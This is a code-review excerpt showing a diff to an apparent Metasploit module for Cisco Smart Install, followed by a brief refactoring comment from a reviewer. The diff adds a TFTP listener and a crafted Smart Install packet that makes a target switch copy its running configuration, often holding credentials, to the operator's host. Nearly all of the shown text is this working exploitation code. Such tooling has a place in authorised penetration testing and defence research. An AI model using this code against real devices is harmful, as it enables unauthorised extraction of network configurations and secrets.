modules/auxiliary/scanner/misc/cisco_smart_install.rb

```diff
@@ -57,10 +65,79 @@ def smi?
     end
   end
 
-  def run_host(_ip)
+  def start_tftp
+    print_status("Starting TFTP Server...")
+    @tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
+    @tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
+    @tftp.start
+    add_socket(@tftp.sock)
+    @main_thread = ::Thread.current
+  end
+
+  def cleanup
+    # Cleanup is called once for every single thread
+    if ::Thread.current == @main_thread
+      # Wait 5 seconds for background transfers to complete
+      print_status("Providing some time for transfers to complete...")
+      ::IO.select(nil, nil, nil, 5.0)
+
+      print_status("Shutting down the TFTP service...")
+      if @tftp
+        @tftp.close rescue nil
+        @tftp = nil
+      end
+    end
+  end
+
+  #
+  # Callback for incoming files
+  #
+  def process_incoming(info)
+    @config_recieved = true
+    return if not info[:file]
+    name = info[:file][:name]
+    data = info[:file][:data]
+    from = info[:from]
+    return if not (name and data)
+
+    # Trim off IPv6 mapped IPv4 if necessary
+    from = from[0].dup
+    from.gsub!('::ffff:', '')
+
+    print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
+    cisco_ios_config_eater(from, 4786, data)
+  end
+
+  def decode_hex(string)
+    string.scan(/../).map { |x| x.hex }.pack('c*')
+  end
+
+  def send_packet
+    copy_config = "copy system:running-config tftp://#{@lhost}/#{Rex::Text.rand_text_alpha(8)}"
+    packet_header = '00000001000000010000000800000408000100140000000100000000fc99473786600000000303f4'
+    packet = (decode_hex(packet_header) + copy_config + decode_hex(('00' * (336 - copy_config.length)))) + (decode_hex(('00' * (336)))) + (decode_hex(('00' * 336)))
+    print_status("Requesting configuration from device...")
+    sock.put(packet)
+  end
+
+  def run_host(ip)
+    @lhost    = datastore['LHOST'] || Rex::Socket.source_address(ip)
```

Comment:
this should just be passed to `send_packet` and only done if the download action is used.